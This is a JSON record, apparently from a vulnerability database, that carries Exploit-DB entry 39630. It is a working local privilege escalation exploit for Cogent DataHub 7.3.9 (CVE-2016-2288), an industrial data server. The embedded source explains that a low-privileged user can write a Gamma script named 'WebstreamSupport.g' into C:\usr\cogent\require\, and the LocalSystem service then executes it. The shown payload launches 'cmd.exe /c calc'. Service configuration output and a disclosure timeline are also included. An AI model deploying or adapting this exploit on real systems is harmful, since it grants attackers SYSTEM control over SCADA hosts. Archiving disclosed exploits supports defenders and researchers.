{"id": "EDB-ID:39630", "vendorId": null, "type": "exploitdb", "bulletinFamily": "exploit", "title": "Cogent Datahub 7.3.9 Gamma Script - Local Privilege Escalation", "description": "", "published": "2016-03-28T00:00:00", "modified": "2016-03-28T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://www.exploit-db.com/exploits/39630", "reporter": "mr_me", "references": [], "cvelist": ["2016-2288"], "immutableFields": [], "lastseen": "2022-08-16T08:20:50", "viewCount": 12, "enchantments": {"dependencies": {}, "score": {"value": 0.3, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2016-2288"]}, {"type": "ics", "idList": ["ICSA-16-084-01"]}]}, "exploitation": null, "vulnersScore": 0.3}, "_state": {"dependencies": 1661190352, "score": 1661184847, "epss": 1678808600}, "_internal": {"score_hash": "165b29bb6675773af419f32292a59bf5"}, "sourceHref": "https://www.exploit-db.com/download/39630", "sourceData": "/*\r\n\r\n# Exploit Title: Cogent Datahub <= 7.3.9 Gamma Script Elevation of Privilege Vulnerability\r\n# Google Dork: lol\r\n# Date: 28/3/2016\r\n# Exploit Author: mr_me\r\n# Vendor Homepage: http://www.cogentdatahub.com/\r\n# Software Link: http://www.cogentdatahub.com/Contact_Form.html\r\n# Version: <= 7.3.9\r\n# Tested on: Windows 7 x86\r\n# CVE : CVE-2016-2288\r\n\r\nsha1sum: c1806faf0225d0c7f96848cb9799b15f8b249792 CogentDataHub-7.3.9-150902-Windows.exe\r\nAdvisory: https://ics-cert.us-cert.gov/advisories/ICSA-16-084-01\r\n\r\nTimeline:\r\n=========\r\n- 02/12/2015 : vuln found, case opened to the zdi\r\n- 09/02/2016 : case rejected (not interested in this vuln due to vector)\r\n- 26/02/2016 : reported to ICS-CERT\r\n- 24/03/2016 : advisory released\r\n\r\nNotes:\r\n======\r\n- to reach SYSTEM, the service needs to be installed via the Service Manager\r\n- the service doesn't need to be installed, as long as 'C:\\Program Files\\Cogent\\Cogent DataHub\\CogentDataHubV7.exe' has been executed by a privileged user\r\n- an attacker does NOT need to restart the machine or the service in order to EP, the service just polls for the Gamma Script\r\n\r\nExploitation:\r\n=============\r\n\r\nAs a Guest user (or low privileged user) save this file as 'WebstreamSupport.g' into C:\\usr\\cogent\\require\\ and enjoy the free SYSTEM calcs. Most OSes don't allow\r\na write into c:\\ as guest, but we are in the SCADA world. Anything is possible.\r\n\r\nC:\\Users\\steven>sc qc \"Cogent DataHub\"\r\n[SC] QueryServiceConfig SUCCESS\r\n\r\nSERVICE_NAME: Cogent DataHub\r\n TYPE : 110 WIN32_OWN_PROCESS (interactive)\r\n START_TYPE : 2 AUTO_START\r\n ERROR_CONTROL : 1 NORMAL\r\n BINARY_PATH_NAME : \"C:\\Program Files\\Cogent\\Cogent DataHub\\CogentDataHubV7.exe\" -H \"C:\\Users\\steven\\AppData\\Roaming\\Cogent DataHub\"\r\n LOAD_ORDER_GROUP :\r\n TAG : 0\r\n DISPLAY_NAME : Cogent DataHub\r\n DEPENDENCIES : RPCSS\r\n SERVICE_START_NAME : LocalSystem\r\n\r\nC:\\Users\\steven>\r\n*/\r\n\r\nrequire (\"Application\");\r\nrequire (\"AsyncRun\");\t\t\t\t// thanks to our friends @ Cogent\r\n\r\nclass WebstreamSupport Application\r\n{\r\n\r\n}\r\n\r\nmethod WebstreamSupport.constructor ()\r\n{\r\n\tRunCommandAsync(nil, nil, \"cmd.exe /c calc\", \"c:\\\\\");\r\n}\r\n\r\nWebstream = ApplicationSingleton (WebstreamSupport);", "osvdbidlist": [], "exploitType": "local", "verified": true}